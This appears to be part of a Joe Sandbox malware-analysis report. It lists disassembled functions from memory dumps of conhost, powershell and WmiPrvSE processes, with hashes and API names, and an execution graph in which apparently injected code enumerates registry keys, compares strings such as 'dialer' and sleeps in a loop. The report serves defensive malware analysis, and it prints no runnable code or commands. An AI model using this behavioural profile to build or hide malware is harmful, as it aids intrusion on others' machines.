                                                                    • Source File: 00000010.00000002.2915463896.000001DCB14E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001DCB14E0000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_16_2_1dcb14e0000_conhost.jbxd
                                                                    Similarity
                                                                    • API ID: FileType
                                                                    • String ID: \\.\pipe\
                                                                    • API String ID: 3081899298-91387939
                                                                    • Opcode ID: 54f1dfa0457f4d2b58266312e3bc9b9bd619b52cd53b64f893b189ad2eed13fb
                                                                    • Instruction ID: a764b8371f3061530ee1c381f568eb3d4e3d1a7d4194ccf8e6127d5a7ce6b1ea
                                                                    • Opcode Fuzzy Hash: 54f1dfa0457f4d2b58266312e3bc9b9bd619b52cd53b64f893b189ad2eed13fb
                                                                    • Instruction Fuzzy Hash: D071E33724078286EB29DF2598467EA6794F3C9BC4F548A27DD4A43B8DDF34C645CB80
                                                                    Function 000001DCAFC19E1C Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 147COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000010.00000002.2915198787.000001DCAFC10000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001DCAFC10000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_16_2_1dcafc10000_conhost.jbxd
                                                                    Similarity
                                                                    • API ID: CallTranslator
                                                                    • String ID: MOC$RCC
                                                                    • API String ID: 3163161869-2084237596
                                                                    • Opcode ID: c123fbbb8780cd52d1c7b069b1b1cc678e7e4f5673d54000f6e5fbfac7098139
                                                                    • Instruction ID: 5b03d70fb54bb1352b1507590ed4b70a15de72f8bc4ad2b0a4b574169888b3c7
                                                                    • Opcode Fuzzy Hash: c123fbbb8780cd52d1c7b069b1b1cc678e7e4f5673d54000f6e5fbfac7098139
                                                                    • Instruction Fuzzy Hash: B7617D37604B4A8AEB20DF66D4803DD77A0F744B8CF054A16EF4917B99EB38D165C784
                                                                    Function 000001DCB14E2330 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 141COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000010.00000002.2915463896.000001DCB14E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001DCB14E0000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_16_2_1dcb14e0000_conhost.jbxd
                                                                    Similarity
                                                                    • API ID: FileType
                                                                    • String ID: \\.\pipe\
                                                                    • API String ID: 3081899298-91387939
                                                                    • Opcode ID: 713d5f66120afee1318357aa22047e1871f046a8e1f6ca4f8182a23e28854f89
                                                                    • Instruction ID: b335cddd0cc22ac3830e0d5702d85c5fbe92a77364fc0cbe75092a69748754c0
                                                                    • Opcode Fuzzy Hash: 713d5f66120afee1318357aa22047e1871f046a8e1f6ca4f8182a23e28854f89
                                                                    • Instruction Fuzzy Hash: F651D13320478381E66C9A29A15A7FA67A1F3C97C4F448B27DE5A13B4DCA39C505CFC0
                                                                    Function 000001DCB14F26F0 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 100fileCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000010.00000002.2915463896.000001DCB14E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001DCB14E0000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_16_2_1dcb14e0000_conhost.jbxd
                                                                    Similarity
                                                                    • API ID: ErrorFileLastWrite
                                                                    • String ID: U
                                                                    • API String ID: 442123175-4171548499
                                                                    • Opcode ID: 769e155e8e03be1ef4aeb5f55e8b8ada6faf705201daec98c5fb8cb61498ce5a
                                                                    • Instruction ID: 120a6cef1945f6a11d1ef9902c96ca587515437ac47ab377f112b9d78cb8d4e9
                                                                    • Opcode Fuzzy Hash: 769e155e8e03be1ef4aeb5f55e8b8ada6faf705201daec98c5fb8cb61498ce5a
                                                                    • Instruction Fuzzy Hash: E741B032314A8186EB21CF25E8457EAB7A0F7887D4F504623EE4E87788EB3CC401CB80
                                                                    Function 000001DCB14E94A0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 44COMMONLIBRARYCODE
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000010.00000002.2915463896.000001DCB14E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001DCB14E0000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_16_2_1dcb14e0000_conhost.jbxd
                                                                    Similarity
                                                                    • API ID: ExceptionFileHeaderRaise
                                                                    • String ID: csm
                                                                    • API String ID: 2573137834-1018135373
                                                                    • Opcode ID: 596d8aa0106168f831d5a6617a756b303fb26e5894bac8705379b132699e985d
                                                                    • Instruction ID: 51c2b26d01f8b6b1778f961c3b3f815fed98a597b062c123ddcfe973fd9996e1
                                                                    • Opcode Fuzzy Hash: 596d8aa0106168f831d5a6617a756b303fb26e5894bac8705379b132699e985d
                                                                    • Instruction Fuzzy Hash: A6112B37214B8192EB658F15E44039977E5F788B94F588622EE8C0779CDF3CC551CB40
                                                                    Function 000001DCAFC17356 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 18COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000010.00000002.2915198787.000001DCAFC10000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001DCAFC10000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_16_2_1dcafc10000_conhost.jbxd
                                                                    Similarity
                                                                    • API ID: __std_exception_copy
                                                                    • String ID: ierarchy Descriptor'$riptor at (
                                                                    • API String ID: 592178966-758928094
                                                                    • Opcode ID: 13d46e236c22f038e3183f277bc937bc0c01c293d14bd07e4c5c2ea041926035
                                                                    • Instruction ID: 40fc34c6154609c2ffd773d436544478ba10669fe3508e64ef0ae5881986fc3d
                                                                    • Opcode Fuzzy Hash: 13d46e236c22f038e3183f277bc937bc0c01c293d14bd07e4c5c2ea041926035
                                                                    • Instruction Fuzzy Hash: 1AE08672640B4A90DF119F22E8402D873A0DB58B78B499523A95C47395FB38D2FAC340
                                                                    Function 000001DCAFC173B4 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 17COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000010.00000002.2915198787.000001DCAFC10000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001DCAFC10000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_16_2_1dcafc10000_conhost.jbxd
                                                                    Similarity
                                                                    • API ID: __std_exception_copy
                                                                    • String ID: Locator'$riptor at (
                                                                    • API String ID: 592178966-4215709766
                                                                    • Opcode ID: af0f0512ca75cd806a30771dd11e2a0f17b9e6725b3a9df23089972a8cb9d3f7
                                                                    • Instruction ID: 163ddd3d3f7235a25989d516fbc3924191d7f146e5288c1948802f7daf6cd46e
                                                                    • Opcode Fuzzy Hash: af0f0512ca75cd806a30771dd11e2a0f17b9e6725b3a9df23089972a8cb9d3f7
                                                                    • Instruction Fuzzy Hash: 04E08672640B4A80DF119F22D4401D87360E758B68B899523E94C47391FB38D1E9C340
                                                                    Function 000001DCB14E1BF4 Relevance: 5.1, APIs: 4, Instructions: 52memoryCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000010.00000002.2915463896.000001DCB14E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001DCB14E0000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_16_2_1dcb14e0000_conhost.jbxd
                                                                    Similarity
                                                                    • API ID: Heap$Process$AllocFree
                                                                    • String ID:
                                                                    • API String ID: 756756679-0
                                                                    • Opcode ID: e6b128499454e36a5cfdb4ce6de946333e896a2fc86765bea62df52d9c8f7d1a
                                                                    • Instruction ID: fac9f6ce7a1fe059568c43d3eae592742512b8d24e6f32f28d5e182fe9de60df
                                                                    • Opcode Fuzzy Hash: e6b128499454e36a5cfdb4ce6de946333e896a2fc86765bea62df52d9c8f7d1a
                                                                    • Instruction Fuzzy Hash: 5E118F36601B45C1EA09DB66E50A2A973A1FBCAFC0F188627DE4D83769DE38D452C780
                                                                    Function 000001DCB14E1268 Relevance: 5.0, APIs: 4, Instructions: 21memoryCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000010.00000002.2915463896.000001DCB14E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001DCB14E0000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_16_2_1dcb14e0000_conhost.jbxd
                                                                    Similarity
                                                                    • API ID: Heap$AllocProcess
                                                                    • String ID:
                                                                    • API String ID: 1617791916-0
                                                                    • Opcode ID: baed807eea30b690d22ace55785552a5eee2cb9bee48e50401e6fb7d80347597
                                                                    • Instruction ID: 335a6de6a1a1984fcd648851762770889f641a924339599221c3d7a7d6db1a47
                                                                    • Opcode Fuzzy Hash: baed807eea30b690d22ace55785552a5eee2cb9bee48e50401e6fb7d80347597
                                                                    • Instruction Fuzzy Hash: 20E06535A01A0586EB098F62D90938A37E1FBC9F86F08C526C90D07365DF7EC899CB90

                                                                    Executed Functions

                                                                    Function 00007FFD34194073 Relevance: 1.4, Strings: 1, Instructions: 182COMMON
                                                                    Download Yara Rule
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000011.00000002.2474837459.00007FFD34190000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34190000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_17_2_7ffd34190000_powershell.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: 8>>4
                                                                    • API String ID: 0-1516185600
                                                                    • Opcode ID: 9b1f3c983214bbc3b4f1e2fcc2c47d15df752dc8344353aaaff636acfe5c87f0
                                                                    • Instruction ID: 86e2bc1eda2c1452a0228e2f84bea5b294f18f378540243656a96af1fe1912ff
                                                                    • Opcode Fuzzy Hash: 9b1f3c983214bbc3b4f1e2fcc2c47d15df752dc8344353aaaff636acfe5c87f0
                                                                    • Instruction Fuzzy Hash: B4510633B0DE560FEBA99E1C54A15B577D2EF96220B5801BAD14DC7193DE28FC059381
                                                                    Function 00007FFD341940BF Relevance: 1.3, Strings: 1, Instructions: 95COMMON
                                                                    Download Yara Rule
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000011.00000002.2474837459.00007FFD34190000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34190000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_17_2_7ffd34190000_powershell.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: 8>>4
                                                                    • API String ID: 0-1516185600
                                                                    • Opcode ID: 445cc195b4c610bdfa14f75ab417a1ff72f6457db717bb17196374639efe9765
                                                                    • Instruction ID: d5f678c91a59bd4a7d38d39792b0348f0e8c612a3f267b78e75d1f11d82a387f
                                                                    • Opcode Fuzzy Hash: 445cc195b4c610bdfa14f75ab417a1ff72f6457db717bb17196374639efe9765
                                                                    • Instruction Fuzzy Hash: 6F219127B0EE564FE7A9DE1C44A117466D2EF66350B4900BAD55DC71A2CF1CFC05A381
                                                                    Function 00007FFD3419681E Relevance: 1.3, Strings: 1, Instructions: 60COMMON
                                                                    Download Yara Rule
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000011.00000002.2474837459.00007FFD34190000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34190000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_17_2_7ffd34190000_powershell.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: (B>4
                                                                    • API String ID: 0-1471016619
                                                                    • Opcode ID: 3f5007ad4cad63b31894593523c988416edc13eb2b100ff4928ca8ddc8fd0a52
                                                                    • Instruction ID: a6588b7aa052769e74ff87bacd19bee9a842cfc8bcff05a67a019a193d98f89b
                                                                    • Opcode Fuzzy Hash: 3f5007ad4cad63b31894593523c988416edc13eb2b100ff4928ca8ddc8fd0a52
                                                                    • Instruction Fuzzy Hash: 1D110633F1DB894FEB55DE9854A41A87BD2EF5A210B0400BEC54CD7193CD29AC45C3A0
                                                                    Function 00007FFD340CA55C Relevance: .3, Instructions: 298COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000011.00000002.2473587953.00007FFD340C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD340C0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_17_2_7ffd340c0000_powershell.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 2ccfa1fcd9270388406b9f3021fbe14d2133701637c188e856e807ac5326f8a1
                                                                    • Instruction ID: 59d18f1741f5c2e02914c7b622a9d0e1703317042a1184ad4320e67ac97944e3
                                                                    • Opcode Fuzzy Hash: 2ccfa1fcd9270388406b9f3021fbe14d2133701637c188e856e807ac5326f8a1
                                                                    • Instruction Fuzzy Hash: F9813C31A0CB4C4FDB59DB6C98497F97BE0EF66321F04426FD049D3192DA78A846CB91
                                                                    Function 00007FFD340C96FA Relevance: .2, Instructions: 215COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000011.00000002.2473587953.00007FFD340C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD340C0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_17_2_7ffd340c0000_powershell.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 933087a0afa3a8224247e038350d667443ac2f536e616d6b8543491c9c01538f
                                                                    • Instruction ID: 962e4635fefbf84557846262b10a96929daefa43801f7338c4e64262895587d4
                                                                    • Opcode Fuzzy Hash: 933087a0afa3a8224247e038350d667443ac2f536e616d6b8543491c9c01538f
                                                                    • Instruction Fuzzy Hash: C8613A72A0DAC94FE7059A6858695A97FE0FF52310F0442BFD0C8C71D3DA28AD06DBC2
                                                                    Function 00007FFD33FAEEBF Relevance: .1, Instructions: 54COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000011.00000002.2472401871.00007FFD33FAD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD33FAD000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_17_2_7ffd33fad000_powershell.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 84e4da84efb7a51fce14da70d86f151c2ca1ddb5975049c754ac93f51fb58f0f
                                                                    • Instruction ID: fd1d2f4e856d7b07259be65246ee8ce3ca8b06ac875949acd874cb229704c37d
                                                                    • Opcode Fuzzy Hash: 84e4da84efb7a51fce14da70d86f151c2ca1ddb5975049c754ac93f51fb58f0f
                                                                    • Instruction Fuzzy Hash: AD014F3160CE088F9AA4EF1DE48595237E0FB98320710075AD41DC755AD735F891CBC1
                                                                    Function 00007FFD340C33B5 Relevance: .0, Instructions: 49COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000011.00000002.2473587953.00007FFD340C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD340C0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_17_2_7ffd340c0000_powershell.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 5cd7bdb080d301f13d20f0c778934d2b47bcc6878ebb588afffc52a1ce257a2a
                                                                    • Instruction ID: 650eefa4ec8cf16f1c07b415097ca142914f3a65c086bb447bf2c36b52bea8b8
                                                                    • Opcode Fuzzy Hash: 5cd7bdb080d301f13d20f0c778934d2b47bcc6878ebb588afffc52a1ce257a2a
                                                                    • Instruction Fuzzy Hash: E601677121CB0C8FDB44EF0CE491AA5B7E0FB99364F50056DE58AC3691DB36E882CB45
                                                                    Function 00007FFD341943FA Relevance: .0, Instructions: 36COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000011.00000002.2474837459.00007FFD34190000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34190000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_17_2_7ffd34190000_powershell.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: c4895cda6f010842e51759ae9cce33879621adfd099702eff31883c36bb69d35
                                                                    • Instruction ID: 9918a5c69c8bd200297d222ab61fa0edae7b2caca9d7e03d00c4557b6bd574dd
                                                                    • Opcode Fuzzy Hash: c4895cda6f010842e51759ae9cce33879621adfd099702eff31883c36bb69d35
                                                                    • Instruction Fuzzy Hash: 29F09A32A4C9458FDB58EF4CE4A48A877E0FF05324B4500BAE14DCB063DA29EC44C790
                                                                    Function 00007FFD340CA2CB Relevance: .0, Instructions: 24COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000011.00000002.2473587953.00007FFD340C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD340C0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_17_2_7ffd340c0000_powershell.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 5976c3c1b4c1d120eb0dc79ad45d0cd4aa24fde8bec3042a0c49796d71db3e79
                                                                    • Instruction ID: 2688e8b096df1be871b4ec8a96903ff488a579eb032ec772260cf578510f213f
                                                                    • Opcode Fuzzy Hash: 5976c3c1b4c1d120eb0dc79ad45d0cd4aa24fde8bec3042a0c49796d71db3e79
                                                                    • Instruction Fuzzy Hash: 5BE04F35908A4C8F9F54EF18C85A5E97BE0FF69315B00029BE90DC7160DB719958CBC2

                                                                    Non-executed Functions

                                                                    Function 00007FFD340C84D3 Relevance: 6.4, Strings: 5, Instructions: 100COMMON
                                                                    Download Yara Rule
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000011.00000002.2473587953.00007FFD340C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD340C0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_17_2_7ffd340c0000_powershell.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: K_^$K_^$K_^$K_^$K_^
                                                                    • API String ID: 0-3188868157
                                                                    • Opcode ID: e491c4519b07fdfbe68936ceef2f3fbde5908af6ffd92b949c1c0873201e267d
                                                                    • Instruction ID: 48c4ab839cfd27094bf1da4c658e75518928d90fa9fd5eb04e456ba10ed5056e
                                                                    • Opcode Fuzzy Hash: e491c4519b07fdfbe68936ceef2f3fbde5908af6ffd92b949c1c0873201e267d
                                                                    • Instruction Fuzzy Hash: 4131A067B0D6C25FE757073858B60A83FA1AF57224B1A00F7C5C8CF0A3EA185906E781
                                                                    Function 00007FFD340C38FD Relevance: 24.1, Strings: 19, Instructions: 379COMMON
                                                                    Download Yara Rule
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000011.00000002.2473587953.00007FFD340C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD340C0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_17_2_7ffd340c0000_powershell.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: L_I$L_I$ :4$0:4$0:4$8:4$8:4$@:4$P:4$X:4$X:4$X:4$`:4$h:4$x:4$x:4$:4$:4$:4
                                                                    • API String ID: 0-1150962951
                                                                    • Opcode ID: f13c786205aae1cf4d1c9bba31ff8aa901bc35577f74a9904e9eeada18ad7e78
                                                                    • Instruction ID: 96575681b740e424d4520af24c0a16f48cdf85fd8aa0a600bc9be33cc1aae584
                                                                    • Opcode Fuzzy Hash: f13c786205aae1cf4d1c9bba31ff8aa901bc35577f74a9904e9eeada18ad7e78
                                                                    • Instruction Fuzzy Hash: 4CC1E587F5FAC14BE356493C29F60746F80EF9361435805FBD1889F0EBA429ED09A2D2

                                                                    Execution Graph

                                                                    Execution Coverage:0.7%
                                                                    Dynamic/Decrypted Code Coverage:0%
                                                                    Signature Coverage:0%
                                                                    Total number of Nodes:74
                                                                    Total number of Limit Nodes:2
                                                                    execution_graph 15075 2246443273c 15077 2246443276a 15075->15077 15076 22464432858 LoadLibraryA 15076->15077 15077->15076 15078 224644328d4 15077->15078 15079 22464461abc 15084 22464461628 GetProcessHeap 15079->15084 15081 22464461ad2 Sleep SleepEx 15082 22464461acb 15081->15082 15082->15081 15083 22464461598 StrCmpIW StrCmpW 15082->15083 15083->15082 15085 22464461648 __std_exception_copy 15084->15085 15129 22464461268 GetProcessHeap 15085->15129 15087 22464461650 15088 22464461268 2 API calls 15087->15088 15089 22464461661 15088->15089 15090 22464461268 2 API calls 15089->15090 15091 2246446166a 15090->15091 15092 22464461268 2 API calls 15091->15092 15093 22464461673 15092->15093 15094 2246446168e RegOpenKeyExW 15093->15094 15095 224644618a6 15094->15095 15096 224644616c0 RegOpenKeyExW 15094->15096 15095->15082 15097 224644616e9 15096->15097 15098 224644616ff RegOpenKeyExW 15096->15098 15133 224644612bc RegQueryInfoKeyW 15097->15133 15100 2246446173a RegOpenKeyExW 15098->15100 15101 22464461723 15098->15101 15104 22464461775 RegOpenKeyExW 15100->15104 15105 2246446175e 15100->15105 15144 2246446104c RegQueryInfoKeyW 15101->15144 15108 22464461799 15104->15108 15109 224644617b0 RegOpenKeyExW 15104->15109 15107 224644612bc 13 API calls 15105->15107 15110 2246446176b RegCloseKey 15107->15110 15111 224644612bc 13 API calls 15108->15111 15112 224644617eb RegOpenKeyExW 15109->15112 15113 224644617d4 15109->15113 15110->15104 15117 224644617a6 RegCloseKey 15111->15117 15115 22464461826 RegOpenKeyExW 15112->15115 15116 2246446180f 15112->15116 15114 224644612bc 13 API calls 15113->15114 15118 224644617e1 RegCloseKey 15114->15118 15120 2246446184a 15115->15120 15121 22464461861 RegOpenKeyExW 15115->15121 15119 2246446104c 5 API calls 15116->15119 15117->15109 15118->15112 15122 2246446181c RegCloseKey 15119->15122 15123 2246446104c 5 API calls 15120->15123 15124 22464461885 15121->15124 15125 2246446189c RegCloseKey 15121->15125 15122->15115 15126 22464461857 RegCloseKey 15123->15126 15127 2246446104c 5 API calls 15124->15127 15125->15095 15126->15121 15128 22464461892 RegCloseKey 15127->15128 15128->15125 15150 22464476168 15129->15150 15131 22464461283 GetProcessHeap 15132 224644612ae __std_exception_copy 15131->15132 15132->15087 15134 2246446148a RegCloseKey 15133->15134 15135 22464461327 GetProcessHeap 15133->15135 15134->15098 15136 2246446133e __std_exception_copy 15135->15136 15137 22464461476 GetProcessHeap HeapFree 15136->15137 15138 22464461352 RegEnumValueW 15136->15138 15140 224644613d3 GetProcessHeap 15136->15140 15141 2246446141e lstrlenW GetProcessHeap 15136->15141 15142 224644613f3 GetProcessHeap HeapFree 15136->15142 15143 22464461443 StrCpyW 15136->15143 15152 2246446152c 15136->15152 15137->15134 15138->15136 15140->15136 15141->15136 15142->15141 15143->15136 15145 224644611b5 RegCloseKey 15144->15145 15146 224644610bf __std_exception_copy 15144->15146 15145->15100 15146->15145 15147 224644610cf RegEnumValueW 15146->15147 15148 2246446114e GetProcessHeap 15146->15148 15149 2246446116e GetProcessHeap HeapFree 15146->15149 15147->15146 15148->15146 15149->15146 15151 22464476177 15150->15151 15151->15151 15153 2246446157c 15152->15153 15156 22464461546 15152->15156 15153->15136 15154 22464461565 StrCmpW 15154->15156 15155 2246446155d StrCmpIW 15155->15156 15156->15153 15156->15154 15156->15155

                                                                    Executed Functions

                                                                    Function 000002246446328C Relevance: 4.5, APIs: 3, Instructions: 43threadCOMMON
                                                                    Download Yara Rule

                                                                    Control-flow Graph

                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000013.00000002.3366872392.0000022464460000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000022464460000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_19_2_22464460000_WmiPrvSE.jbxd
                                                                    Similarity
                                                                    • API ID: Current$FileModuleNameProcessProtectThreadVirtual$CreateFindHandlePath
                                                                    • String ID:
                                                                    • API String ID: 1683269324-0
                                                                    • Opcode ID: c94412c55dcd243bcd3fbe265bea19663896af10ab27123b85acb7154d5eea14
                                                                    • Instruction ID: 24d9a69b9f2811d097d7977f07e211b8fd88f9aa36758282d9768cdd6bfa49be
                                                                    • Opcode Fuzzy Hash: c94412c55dcd243bcd3fbe265bea19663896af10ab27123b85acb7154d5eea14
                                                                    • Instruction Fuzzy Hash: 81116D70B10680A6FFB0BBE5F80F3B922DCB756355FD05128990681DDDEF78C0848A00
                                                                    Function 0000022464461ABC Relevance: 3.1, APIs: 2, Instructions: 68sleepCOMMON
                                                                    Download Yara Rule

                                                                    Control-flow Graph

                                                                    APIs
                                                                      • Part of subcall function 0000022464461628: GetProcessHeap.KERNEL32 ref: 0000022464461633
                                                                      • Part of subcall function 0000022464461628: HeapAlloc.KERNEL32 ref: 0000022464461642
                                                                      • Part of subcall function 0000022464461628: RegOpenKeyExW.ADVAPI32 ref: 00000224644616B2
                                                                      • Part of subcall function 0000022464461628: RegOpenKeyExW.ADVAPI32 ref: 00000224644616DF
                                                                      • Part of subcall function 0000022464461628: RegCloseKey.ADVAPI32 ref: 00000224644616F9
                                                                      • Part of subcall function 0000022464461628: RegOpenKeyExW.ADVAPI32 ref: 0000022464461719
                                                                      • Part of subcall function 0000022464461628: RegCloseKey.ADVAPI32 ref: 0000022464461734
                                                                      • Part of subcall function 0000022464461628: RegOpenKeyExW.ADVAPI32 ref: 0000022464461754
                                                                      • Part of subcall function 0000022464461628: RegCloseKey.ADVAPI32 ref: 000002246446176F
                                                                      • Part of subcall function 0000022464461628: RegOpenKeyExW.ADVAPI32 ref: 000002246446178F
                                                                      • Part of subcall function 0000022464461628: RegCloseKey.ADVAPI32 ref: 00000224644617AA
                                                                      • Part of subcall function 0000022464461628: RegOpenKeyExW.ADVAPI32 ref: 00000224644617CA
                                                                    • Sleep.KERNEL32 ref: 0000022464461AD7
                                                                    • SleepEx.KERNELBASE ref: 0000022464461ADD
                                                                      • Part of subcall function 0000022464461628: RegCloseKey.ADVAPI32 ref: 00000224644617E5
                                                                      • Part of subcall function 0000022464461628: RegOpenKeyExW.ADVAPI32 ref: 0000022464461805
                                                                      • Part of subcall function 0000022464461628: RegCloseKey.ADVAPI32 ref: 0000022464461820
                                                                      • Part of subcall function 0000022464461628: RegOpenKeyExW.ADVAPI32 ref: 0000022464461840
                                                                      • Part of subcall function 0000022464461628: RegCloseKey.ADVAPI32 ref: 000002246446185B
                                                                      • Part of subcall function 0000022464461628: RegOpenKeyExW.ADVAPI32 ref: 000002246446187B
                                                                      • Part of subcall function 0000022464461628: RegCloseKey.ADVAPI32 ref: 0000022464461896
                                                                      • Part of subcall function 0000022464461628: RegCloseKey.ADVAPI32 ref: 00000224644618A0
                                                                    Memory Dump Source
                                                                    • Source File: 00000013.00000002.3366872392.0000022464460000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000022464460000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_19_2_22464460000_WmiPrvSE.jbxd
                                                                    Similarity
                                                                    • API ID: CloseOpen$HeapSleep$AllocProcess
                                                                    • String ID:
                                                                    • API String ID: 1534210851-0
                                                                    • Opcode ID: ad614115fa5d2181ccf7742c52f053f5bbac07b16a2f1961ccdf1ed8f9939afa
                                                                    • Instruction ID: a36ad86ea38c3722bba6d2696753954050bac1414b4e4c9784073a6c1ca4a3b7
                                                                    • Opcode Fuzzy Hash: ad614115fa5d2181ccf7742c52f053f5bbac07b16a2f1961ccdf1ed8f9939afa
                                                                    • Instruction Fuzzy Hash: DF31216530064172FFF0BBA6D65B3B957ADEB46FD0F8858218E0987E9EFE10C851CA10
                                                                    Function 0000022464463844 Relevance: 3.0, APIs: 1, Strings: 1, Instructions: 15COMMON
                                                                    Download Yara Rule

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 57 22464463844-2246446384f 58 22464463869-22464463870 57->58 59 22464463851-22464463864 StrCmpNIW 57->59 59->58 60 22464463866 59->60 60->58
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000013.00000002.3366872392.0000022464460000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000022464460000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_19_2_22464460000_WmiPrvSE.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: dialer
                                                                    • API String ID: 0-3528709123
                                                                    • Opcode ID: 65427932a6511f3c8dca5889eed1792e2f2e2d3e0b30565664b7cb78ea33e46c
